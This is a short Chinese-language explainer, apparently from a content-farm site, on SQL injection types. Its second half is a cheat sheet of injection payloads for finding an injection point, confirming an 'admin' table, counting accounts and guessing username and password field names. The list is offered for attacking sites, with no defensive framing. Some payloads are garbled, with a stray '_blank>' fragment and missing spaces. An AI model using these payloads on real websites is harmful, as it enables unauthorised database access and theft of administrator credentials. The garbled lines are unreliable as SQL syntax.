sql注入语句是怎样的? sql注入语句

sql注入句子是什么样让我们一起来看看:
sql注入句实际上可以分为三种，即数字注入点，句子通常是select * from表名where id=1 and 1=1；字符注入点，句子一般为select * from表名where name...；搜索注入点。
而sql即通过将注入SQL命令插入到Web提交表格或输入域名和页面请求的查询字符串，最终欺骗服务器恶意执行SQL命令。
sql注入类型通常可以以不同的方式进行分类。例如，如果按注入点类型进行分类，可分为数字注入点、字符注入点和搜索注入点。如果按数据提交的方式进行分类，可分为get 注入、Post 注入、Cookie 注入、HTTP 注入头部。
当然也可以根据执行效果进行分类，可以分为基于布尔的盲注、基于时间的盲注、基于报错注、联合查询注。
常用的句子有：
1、判断是否有注入点
; and 1=1 and 1=2
2、猜表通常表的名称基本上是admin adminuser user pAss password 等..
and 0<>(select count(*) from *)
and 0<>(select count(*) from admin) ---判断它是否存在admin这张表
【sql注入语句是怎样的? sql注入语句】3、如果遇到猜账号数量 0< 返回正确的页面 1<返回错误页面意味着账户数量是一个
and 0<(select count(*) from admin)
and 1<(select count(*) from admin)
4、猜测字段名称在len()括号中可以添加所想到的字段名称。
and 1=(select count(*) from admin where len(*)>0)--
and 1=(select count(*) from admin where len(用户字段名称name)>0)
and 1=(select count(*) from admin where len(_blank>密码字段名称password)>0)
以上是小编的分享，希望对大家有所帮助。